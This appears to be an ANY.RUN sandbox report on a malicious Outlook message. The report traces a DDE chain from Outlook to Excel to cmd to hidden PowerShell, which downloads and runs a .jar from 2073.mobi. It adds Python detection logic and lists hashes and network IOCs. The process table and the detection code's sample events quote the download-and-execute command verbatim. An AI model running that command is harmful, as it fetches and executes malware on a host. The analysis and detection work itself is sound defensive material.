File name: | FW 12 22 43 Sel amlar hay irli calismalar p arca d osyasi .msg |
Full analysis: | https://app.any.run/tasks/734ad156-50f6-4b24-af26-46f7d11d181d |
Verdict: | Malicious activity |
Analysis date: | April 23, 2019, 09:21:03 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | application/vnd.ms-outlook |
File info: | CDFV2 Microsoft Outlook Message |
MD5: | C01E7AEE0273792C49BF62DFE438780D |
SHA1: | 9216A2DAED28519E83B00B5793E0C1FD25697F48 |
SHA256: | 452C337A9D71E85B8A3727BEF94520443F04211F6ADCA9A45015FDBD1C090824 |
SSDEEP: | 1536:y/bmQCqQS5A0UXOb7JEDTCFmKOTKoKKKhZZ58V3SSy2DhfXXTnnnPjtAAA:y/bTCqdBpGbKOTKoKKKhZZ5G |
Extension | Type | Confidence
---|---|---
.msg | Outlook Message | 58.9
.oft | Outlook Form Template | 34.4
PID | CMD | Path | Indicators | Parent process
---|---|---|---|---
3864 | "C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE" /f "C:\Users\admin\AppData\Local\Temp\FW 12 22 43 Sel amlar hay irli calismalar p arca d osyasi .msg" | C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE | — | explorer.exe
User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Outlook; Version: 14.0.6025.1000 | | | |
1300 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | OUTLOOK.EXE
User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Excel; Version: 14.0.6024.1000 | | | |
3816 | CMD.EXE /c powershell -executionpolicy bypass -W Hidden -command "& { (new-object System.Net.WebClient).DownloadFile(\"http://2073.mobi\" ,\" %tmp%\\ZINreb.jar\") }" & %tmp%\\ZINreb.jar | C:\Windows\system32\CMD.EXE | — | EXCEL.EXE
User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 1; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | | | |
2220 | powershell -executionpolicy bypass -W Hidden -command "& { (new-object System.Net.WebClient).DownloadFile(\"http://2073.mobi\" ,\" C:\Users\admin\AppData\Local\Temp\\ZINreb.jar\") }" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | CMD.EXE
User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255) | | | |
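The process table records the whole delivery chain: Outlook opens the .msg, starts Excel with the `/dde` switch, Excel spawns CMD.EXE, and CMD.EXE runs a hidden, execution-policy-bypassing PowerShell that calls `System.Net.WebClient.DownloadFile` to fetch a .jar into `%tmp%` and then tries to run it. In this run the fetch of http://2073.mobi returned 404 (see the HTTP table below) and no ZINreb.jar appears among the created files, which is why CMD.EXE exited with code 1; detection should fire on the attempt regardless. The following is an added example, not part of the ANY.RUN report or its tooling: process-creation events constructed from the table above (the field names pid/ppid/image/cmdline and the explorer.exe PID are assumptions; the report does not give a PID for explorer.exe) run through detection logic that flags an Office-to-Office `/dde` launch, an Office process spawning a shell, a shell with an Office ancestor further up the tree (the PowerShell here sits two hops under Excel, so a parent-only check misses it), suspicious PowerShell flags, and the download URL as an IOC.

```python
"""Detect the Office -> cmd -> PowerShell download chain from process-creation events.

Added example, not part of the ANY.RUN report. EVENTS is constructed from the
report's process table; field names and the explorer.exe PID are assumptions.
"""
import re
from dataclasses import dataclass
from pathlib import PureWindowsPath
from typing import Dict, List, Optional, Tuple

OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELL_IMAGES = {"cmd.exe", "powershell.exe"}

# PowerShell switches that hide the window, bypass policy, or pull code from the network.
PS_FLAGS = {
    "executionpolicy_bypass": re.compile(r"-(?:ex(?:ecutionpolicy)?|ep|exec)\s+bypass", re.I),
    "window_hidden": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "encoded_command": re.compile(r"-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "net_download": re.compile(r"Net\.WebClient|DownloadFile|DownloadString|Invoke-WebRequest", re.I),
}
URL_RE = re.compile(r"https?://[^\s\"'<>\\)]+", re.I)

# Constructed from the report's process table. PID 1000 for explorer.exe is made up.
EVENTS = [
    {"pid": 1000, "ppid": 0, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 3864, "ppid": 1000, "image": r"C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE",
     "cmdline": r'"C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE" /f "C:\Users\admin\AppData\Local\Temp\FW 12 22 43 Sel amlar hay irli calismalar p arca d osyasi .msg"'},
    {"pid": 1300, "ppid": 3864, "image": r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
     "cmdline": r'"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde'},
    {"pid": 3816, "ppid": 1300, "image": r"C:\Windows\system32\CMD.EXE",
     "cmdline": r'CMD.EXE /c powershell -executionpolicy bypass -W Hidden -command "& { (new-object System.Net.WebClient).DownloadFile(\"http://2073.mobi\" ,\" %tmp%\\ZINreb.jar\") }" & %tmp%\\ZINreb.jar'},
    {"pid": 2220, "ppid": 3816, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell -executionpolicy bypass -W Hidden -command "& { (new-object System.Net.WebClient).DownloadFile(\"http://2073.mobi\" ,\" C:\Users\admin\AppData\Local\Temp\\ZINreb.jar\") }"'},
]


@dataclass
class Finding:
    pid: int
    rule: str
    detail: str


def basename(image: str) -> str:
    return PureWindowsPath(image).name.lower()


def extract_urls(cmdline: str) -> List[str]:
    """Pull http(s) URLs out of a command line; stops at the escaped quote that follows them."""
    return URL_RE.findall(cmdline)


def office_ancestor(pid: int, by_pid: Dict[int, dict], max_hops: int = 4) -> Optional[Tuple[int, int]]:
    """Walk up the parent chain; return (ancestor_pid, hops) for the first Office image found."""
    cur, hops = by_pid.get(pid), 0
    while cur is not None and hops < max_hops:
        cur = by_pid.get(cur["ppid"])
        hops += 1
        if cur is not None and basename(cur["image"]) in OFFICE_IMAGES:
            return cur["pid"], hops
    return None


def analyze(events: List[dict]) -> List[Finding]:
    by_pid = {e["pid"]: e for e in events}
    findings: List[Finding] = []
    for e in events:
        name = basename(e["image"])
        parent = by_pid.get(e["ppid"])
        pname = basename(parent["image"]) if parent else ""
        cmd = e["cmdline"]
        # Office app started with /dde by another Office app (Outlook -> Excel step).
        if name in OFFICE_IMAGES and pname in OFFICE_IMAGES and re.search(r"\s/dde\b", cmd, re.I):
            findings.append(Finding(e["pid"], "office_dde_launch", f"{pname} -> {name} /dde"))
        # Office app directly spawning a shell (Excel -> cmd step).
        if name in SHELL_IMAGES and pname in OFFICE_IMAGES:
            findings.append(Finding(e["pid"], "office_spawns_shell", f"{pname} -> {name}"))
        # Shell whose Office ancestor is further up (catches powershell under cmd).
        if name in SHELL_IMAGES and pname not in OFFICE_IMAGES:
            anc = office_ancestor(e["pid"], by_pid)
            if anc:
                findings.append(Finding(e["pid"], "office_ancestor", f"Office pid {anc[0]}, {anc[1]} hops up"))
        # Any command line invoking powershell with two or more hostile switches, plus its URLs.
        if "powershell" in cmd.lower():
            hits = [k for k, rx in PS_FLAGS.items() if rx.search(cmd)]
            if len(hits) >= 2:
                findings.append(Finding(e["pid"], "suspicious_powershell", ",".join(hits)))
            for url in extract_urls(cmd):
                findings.append(Finding(e["pid"], "download_url", url))
    return findings


if __name__ == "__main__":
    for f in analyze(EVENTS):
        print(f"pid {f.pid:<5} {f.rule:<22} {f.detail}")
```

The ancestor walk is the part worth keeping in a real rule: on this tree only the cmd.exe process has an Office parent, so a detection keyed on "parent is Office" sees the launcher but not the PowerShell that does the download, and the `/dde` rule is what ties the chain back to the message rather than to a macro.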
PID | Process | Filename | Type | MD5 | SHA256
---|---|---|---|---|---
3864 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Temp\CVR2DB4.tmp.cvr | — | — | —
3864 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3E295D9C.dat | image | 3D5F732E72E96EF1EC2F3877C172397E | D63218A5F04FE3924E83EE3B190FE8D1365FB6B04170FEDC7635C30F61F9B006
3864 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BFA25047.dat | image | BD9EF18DB6EF932C03E93A6DA9CD4CE7 | 490ACF9B24FAD678AB25498745243E536C85D76046C9709757DFA0BF3546439F
3864 | OUTLOOK.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$rmalEmail.dotm | pgc | F538C5CECA44D198F32BEAF9BD83B6C1 | 0381559AACD57F5AF3BA32B3D3732F3A6CA085C8A0937647EB4D5956FC006051
3864 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C7A1E8ED.dat | image | 7327A31C0D0A0AD1D8C508BD43CF886E | 787452BC75841BDDDC9FDDBCA20934665F0FE63E6B7E8CB47950B7E7122D802D
3864 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A3C96A8.dat | image | E9464B730CF4BDA59247CD2E56E68674 | FA00F7E2C5B6EA2EA94FCEB4AC5612E4C8E8A8BCF5B7678CB005C78386BCB044
3864 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2E832CA2.dat | image | B1A0ABA9E8A52389FED582D9EF821594 | A163590CC55B4992562A8E445785E2CFDC9E03CA75A11CAE57894C00B9028E11
3864 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3860027F.dat | image | 580224CE062B2BC1F9B7B9AD998FAFEC | 106CB6B2A07BA9D7EC3477F1EFC5F12C50EB6BE9C5003DA876BC4FDB27A2E0FF
3864 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\94FD3AF6.dat | image | 69B7FC9EFFA301E4238337F80F7B1943 | 3D46E040A7D64A865A19737100650A468E02CDC78B15124AC1924C90A1A14AD0
3864 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5C45BA74.dat | image | B07BEE671DC501FFDD2A7A92C4C12EEB | 70AFAFB0193E9425AA23313B43FE1C1C7D54BF4E9D74FD1243D4073203FDC750
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2220 | powershell.exe | GET | 404 | 23.254.215.182:80 | http://2073.mobi/ | US | — | — | malicious |
3864 | OUTLOOK.EXE | GET | — | 64.4.26.155:80 | http://config.messenger.msn.com/config/msgrconfig.asmx?op=GetOlcConfig | US | — | — | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3864 | OUTLOOK.EXE | 64.4.26.155:80 | config.messenger.msn.com | Microsoft Corporation | US | whitelisted |
2220 | powershell.exe | 23.254.215.182:80 | 2073.mobi | Hostwinds LLC. | US | malicious |
Domain | IP | Reputation
---|---|---
config.messenger.msn.com | — | whitelisted
2073.mobi | — | malicious